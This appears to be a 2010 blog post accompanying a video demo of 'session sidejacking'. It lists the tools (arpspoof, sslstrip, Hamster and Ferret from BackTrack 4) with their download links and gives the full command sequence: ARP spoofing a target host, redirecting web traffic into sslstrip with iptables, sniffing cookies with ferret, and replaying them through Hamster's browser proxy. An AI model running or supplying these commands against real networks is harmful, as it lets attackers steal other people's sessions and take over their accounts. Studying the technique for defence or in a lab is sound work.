Session Sidejacking (Ferret + Hamster)

This videos demos, how to "Session Sidejacking". Sidejacking is where you clone your targets cookies therefore your "sharing" their identity for that account (without ever knowing the username or password)!

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Ferret___Hamster.mp4

Tools

• arpspoof
• sslstrip
• Hamster (and Ferret)

All in BackTrack 4 Final

Software

Name: arpspoof (DSniff)

Version: 2.3

Home Page: http://www.monkey.org/~dugsong/dsniff/

Download Link: http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz

Name: sslstrip

Version: 0.6

Home Page: http://www.thoughtcrime.org/software/sslstrip/index.html

Download Link: hxxp://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz

Name: Hamster Sidejacking Tool

Version: 2.0

Home Page: hxxp://hamster.erratasec.com/ (Mirror: http://web.archive.org/web/20090327125018/http://hamster.erratasec.com/)

Download Link: hxxp://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z

Commands

1
2
3
4
5
6
7
8
9
10
11
12

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sslstrip -p -k -f

/pentest/sniffers/hamster/ferret -i eth0

/pentest/sniffers/hamster/hamster

Konqueror -> Settings -> Configure Konqueror -> Proxy -> Manually. 127.0.0.1:1234
Konqueror -> http://hamster/

Notes

Song: Soulwax - Bonkers (As Heard On Radio Soulwax Edit)

Video length: 2:39

Capture length: 3:42

Blog Post: https://blog.g0tmi1k.com/2010/03/session-sidejacking-ferret-and/